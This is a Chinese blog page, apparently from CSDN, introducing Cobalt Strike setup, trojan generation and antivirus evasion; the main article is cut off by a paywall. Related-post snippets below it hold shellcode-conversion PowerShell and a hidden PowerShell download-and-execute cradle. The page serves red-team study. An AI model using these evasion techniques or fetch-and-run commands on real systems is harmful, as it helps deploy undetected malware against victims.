CS(Cobaltstrike)免杀和使用(附脚本)

最新推荐文章于 2024-09-21 13:47:52 发布
最新推荐文章于 2024-09-21 13:47:52 发布
阅读量1.7w 收藏 183
点赞数 13
分类专栏: 技术干货
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/119037185
版权
本文详细介绍了Cobaltstrike的免杀方法,包括资源修改、加壳等,结合Restorator工具进行木马伪装。此外,还阐述了如何将Cobaltstrike会话传递给Metasploit,以及利用Cobaltstrike进行提权、伪造Windows登录界面、获取浏览器密码和内网扫描等高级功能。
摘要由CSDN通过智能技术生成 
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一

作者:掌控安全-hpb1分享!

一.Cobaltstrike简介

作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选

fireeye多次分析过实用cobaltstrike进行apt的案例。

Cobaltstrike安装

CS需要一个服务器来进行,我们把它放到服务器上。

然后运行./teaserver ip 密码即可。

图片

然后使用CS客户端连接即可,输入对应ip、端口和密码。

图片

Cobaltstrike生成木马

首先创建监听器

图片

攻击-》生成后门-》windows executable,选择监听点击保存即可生成木马

图片
在这里插入图片描述
在这里插入图片描述

不过CS生成木马已经被杀软加入病毒库,很容易别查杀,所以我们需进行一些免杀操作。

图片

二.常见免杀方式

最低0.47元/天 解锁文章
zkzq
关注
专栏目录
CS-Loader:CS免杀
03-22
CS-避免杀CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
cs免杀(一)
kuuhh的博客
08-12 655
前言 网上搜了几篇文章复现下操作。 ps1文件免杀 生成ps1文件 将关键字FromBase64String括号内的字符串复制起来。 将下面代码保存改为ps1文件执行 $string = '' $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('刚刚复制的字符串') $s |foreach { $string = $string + $_.ToString()+','} $string > d:\1.txt 代码输出到1.t
免杀CS免杀——ps1免杀
最新发布
qinjilll的博客
09-21 1021
❤️🔥🎉。
CS免杀姿势
YJ_12340的博客
08-03 636
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
CS免杀之信手拈来
Gamma_lab的博客
08-06 1665
前言 最近搞了一个cs免杀的东西出来,主流的杀毒软件,某绒,某0,windows defender都轻松过掉,但是把在测试卡巴全方位版时,成功上线之后就死掉了,我怀疑不是内存查杀,如果是内存查杀,我把shellcode写进去内存的时候,就应该爆肚了,我觉得还是cs上线之后的行为触发卡巴的杀毒机制,就哦豁了。 然后我就在github上面找点项目来参考一下,果然找到一个很不错的项目,这里分享给大家。 免杀实践 项目地址: https://github.com/ORCA666/EVA2 根据作者描述,这个项目
CS免杀
anwen12的博客
02-06 5231
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
CobaltStrike4.4.zip
09-15
在这个"CobaltStrike4.4.zip"压缩包中,包含了多个与Cobalt Strike 4.4版本相关的文件,它们在网络安全测试和防御演练中扮演着重要角色。 首先,`agscript`可能是指Cobalt Strike的Aggressor Script,这是一种...
Cobalt Strike 4.8 Full Black Edition
06-23
Cobalt Strike是一款广泛应用于网络安全测试、红队操作和漏洞利用模拟的专业工具,其4.8 Full Black Edition是该软件的一个版本。这个版本通常包含了所有功能,并可能包含一些额外的特性或者更新,专为安全研究人员...
CobaltStrike4.5,渗透利器
12-17
`cobaltstrike.store`文件可能是存储自定义模块、负载或者其他配置信息的地方,这些信息对个性化和优化Cobalt Strike使用非常有用。 总的来说,Cobalt Strike 4.5是一个强大的渗透测试套件,它的功能涵盖了攻击链...
CobaltStrike V4.zip
03-20
- `cobaltstrike.auth`:这可能是Cobalt Strike的授权文件,用于验证软件的合法使用。 - `cobaltstrike.bat`:这是一个批处理文件,可能用于启动或配置Cobalt Strike环境。 - `teamserver.cmd`:团队服务器命令,...
免杀必备工具cs32asm
03-03
免杀工具cs32大家不会陌生吧 用于特征码的 填充修改 免杀必备
CobaltStrike使用插件实现免杀
m0_74025111的博客
04-24 703
免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。
1分钟了解Socket(1)
2401_84968612的博客
05-11 251
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Cobalt_StrikeCS)渗透工具安装使用免杀上线
qq_47289634的博客
06-02 704
接着写一段C代码,对加密后的shellcode进行解密并执行,注意后缀是.c,不是.cpp它们是不一样的。把生成的exe文件放到虚拟机执行之后一样上线,这样要注意把加密后的shellcode也要放入虚拟机。上面代码运行之后会在当前文件夹下生成一个bin文件,记住这个文件的位置,这里我把它放到了E盘下面。记得关闭杀软,不然会被删,把生成的exe文件放到目标主机双击,即可上线cs。vt过60,一大半了,对于刚接触免杀的我来说,已经不错了。这里代码有很多是我方便调试写的,可以去掉那些打印的。
红蓝对抗经验分享:CS免杀姿势
m0_61869253的博客
07-27 578
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
简单快捷的 CS 一键免杀插件 CSx3Ldr
yutianovo的博客
02-20 850
Cobalt Strike插件
CobaltStrike使用-第九篇-免杀
Love&Share
12-08 7965
本篇将会介绍CS payload免杀工具的使用 文章目录杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要对病毒文件进行免杀处理,从而使杀毒软件认为我们的文件是合法文件 杀毒软件 杀软常见扫描方式 扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。 程序窜改防护:即是避免恶意程序借由删除杀.
Cobalt Strike免杀(完结)
qq_32445755的博客
04-18 858
多字节 XOR 或 AES 加密的 shellcode 生成payload 环境 linux python2 工具ShellcodeWrapper 查看python位置 python -c "import sys; print sys.executable" pip2 安装 # 安装setuptools wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gz tar ..
cobaltstrike安装使用
08-29
要安装和使用Cobalt Strike,可以按照以下步骤进行操作。 1. 首先,使用PowerShell进入Cobalt Strike所在文件夹。可以使用以下命令:cd C:\Users\25459\Desktop\tools\tool\cobaltstrike 2. 接下来,使用以下命令生成一个密钥库和密钥,并将其写入注册表:./Keytool.exe -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey***, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" 3. 然后,使用以下命令启动Cobalt Strike的teamserver服务:.\teamserver.bat 8.8.8.8 123456 至此,Cobalt Strike已经安装并启动了teamserver服务。现在你可以使用Cobalt Strike进行渗透测试和模拟高级威胁者的后渗透行动了。Cobalt Strike是一个功能强大的平台,适用于Windows和Linux系统,并且可以调用其他知名工具如Mimikatz、Ladon等。它采用了C/S架构,客户端连接到团队服务器,团队服务器再与目标进行交互,确保了操作的安全性和隐秘性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Cobaltstrike简介、安装及简单使用](https://blog.csdn.net/LUOBIKUN/article/details/108707160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Cobalt Strike4.7最新版](https://download.csdn.net/download/weixin_53912233/86890411)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Cobalt Strike(CS)介绍,安装及初步使用(学习笔记1)](https://blog.csdn.net/m0_63239459/article/details/129341297)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值